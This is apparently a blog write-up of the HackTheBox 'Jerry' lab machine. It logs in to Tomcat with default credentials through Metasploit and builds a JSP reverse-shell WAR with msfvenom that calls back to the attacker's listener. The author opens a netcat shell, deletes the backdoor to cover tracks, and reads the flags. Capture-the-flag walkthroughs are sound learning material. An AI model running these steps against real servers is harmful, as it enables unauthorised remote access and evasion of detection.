One Eyed Techs

127.0.0.1 WHOIS

09/09-2018

HackTheBox: jerry by mrh4sh

As usual, we'll start off by scanning the machine.

root@kali:~# nmap -sV -sC -Pn 10.10.10.95
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-12 06:10 EDT
Nmap scan report for 10.10.10.95
Host is up (0.041s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 23.28 seconds

Service detection performed. Please report any incorrect results at https://nmap.org/submit/
Nmap done: 1 IP address (1 host up) scanned in 18.35 seconds

Tomcat 7.0.88 is open on port 8080. Going to http://10.10.10.95:8080, returns the default Apache Tomcat startpage.

Tomcat default

Let's scan the /manager/html for default logins through the metasploit framework. (Yes, I'm aware that it's also displayed on the 401 unauthorized access site)

root@kali:~# msfconsole

msf > use auxiliary/scanner/http/tomcat_mgr_login

msf auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.10.10.95
msf auxiliary(scanner/http/tomcat_mgr_login) > run

The auxiliary returns as positive, for a single default login. tomcat:s3cret.

Tomcat default login

This login gives us access to Tomcat Web Application Manager on http://10.10.10.95:8080/manager/html. and allows us to deploy .war files. Or even better, a malicious .war backdoor file. ˙ ͜ʟ˙

Let's try out with a .war backdoor first. I'll use msfvenom to create the payload, and output it to the Desktop.

root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.32 LPORT=4444 -f war > reverse.war
Payload size: 1085 bytes
Final size of war file: 1085 bytes

There are multiple ways to do this. Another way is through metasploit. However, it's more fun doing it manually ;-). Let's upload the backdoor through the Web Application Manager and listen to anything on port 4444 with netcat.

Backdoor war 
root@kali:~# nc -lvp 4444
listening on [any] 4444 ...

The backdoor is now displayed as a running application.

Backdoor war running

When entering http://10.10.10.95:8080/reverse/, the reverse shell opens in netcat.

root@kali:~# nc -lvp 4444
listening on [any] 4444 ...
10.10.10.95: inverse host lookup failed: Unknown host
connect to [10.10.14.32] from (UNKNOWN) [10.10.10.95] 49208
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>

After the reverse shell opening, we can delete our malicious .war backdoor to (somewhat) cover our tracks, and keep the connection open.

After searching for a bit, I found a file located in C:\Users\Administrator\Desktop\flags called "2 for the price of one.txt". Displaying the contents gives us both user and root flag.

C:\apache-tomcat-7.0.88>
C:\apache-tomcat-7.0.88>cd \Users\Administrator\Desktop\flags
cd \Users\Administrator\Desktop\flags

C:\Users\Administrator\Desktop\flags>type *
type *
user.txt
7004dbcef0f854e0fb401875f26XXXXX

root.txt
04a8b36e1545a455393d067e772XXXXX
C:\Users\Administrator\Desktop\flags>

This box got critisized for it's easiness, unstableness and non existing privilige escalation. I found it enjoyable and fun to do. I learned from it, which is what I care for.

Copyright © 2023 One Eyed Techs. All rights reserved.